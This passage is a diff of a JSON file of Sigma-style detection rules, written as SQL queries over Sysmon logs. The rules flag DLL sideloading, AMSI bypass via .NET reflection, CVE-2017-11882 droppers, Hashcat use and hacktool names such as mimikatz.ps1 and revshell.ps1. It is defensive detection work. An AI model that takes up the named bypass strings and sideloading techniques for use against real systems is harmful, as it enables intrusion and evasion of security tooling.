'%C:\\\\WINDOWS\\\\Explorer.EXE%' ESCAPE '\\') OR (Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\proquota.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\System32\\\\icast.exe' ESCAPE '\\')))))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": 
"proc_creation_win_persistence_userinitmprlogonscript.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", + "title": "Wusa Extracting Cab Files", + "id": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.execution" ], "falsepositives": [ - "Unknown" + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR Image LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ], + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\CVE-202%' ESCAPE '\\' OR Image LIKE 
'%\\\\CVE202%' ESCAPE '\\') OR (Image LIKE '%\\\\poc.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR Image LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR Image LIKE '%obfuscated.exe' ESCAPE '\\' OR Image LIKE '%obfusc.exe' ESCAPE '\\' OR Image LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": 
"Suspicious WSMAN Provider Image Loads", - "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", - "status": "experimental", - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR 
Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_wsman_provider_image_load.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "Fsutil Behavior Set SymlinkEvaluation", + "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 
'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1574.002", - 
"attack.t1574.001" + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "UIPromptForCredentials DLLs", - "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "title": "Browser Started with Remote Debugging", + "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", "status": "experimental", - "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.t1185" ], "falsepositives": [ - "Other legitimate processes loading those DLLs in your environment." 
+ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (Image LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" ], - "filename": "image_load_uipromptforcreds_dlls.yml" + "filename": "proc_creation_win_browsers_remote_debugging.yml" }, { - "title": "Potential Antivirus Software DLL Sideloading", - "id": 
"552b6b65-df37-4d3e-a258-f2fc4771ae54", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "status": "test", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT 
((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_antivirus.yml" + "filename": 
"proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", + "title": "Add New Download Source To Winget", + "id": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of winget to add new additional download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" - ], - "falsepositives": [ - "Other DLLs with the same Imphash" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" - ], - "filename": "image_load_hktl_sharpevtmute.yml" - }, - { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", - "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", - "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unlikely" + "False positive are expected with legitimate sources" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\'))" ], - "filename": 
"image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_winget_add_custom_source.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "WMIC Loading Scripting Libraries", - "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "status": "test", - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and 
execute an XSL file (i.e js, vbs, etc).", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. 
startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Unknown" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Write Protect For Storage Disabled", - "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "title": "PowerShell Web Download", + "id": "6e897651-f157-4d8f-aaeb-df8151488385", "status": "experimental", - "description": "Looks for changes to registry to disable any write-protect property for storage devices. 
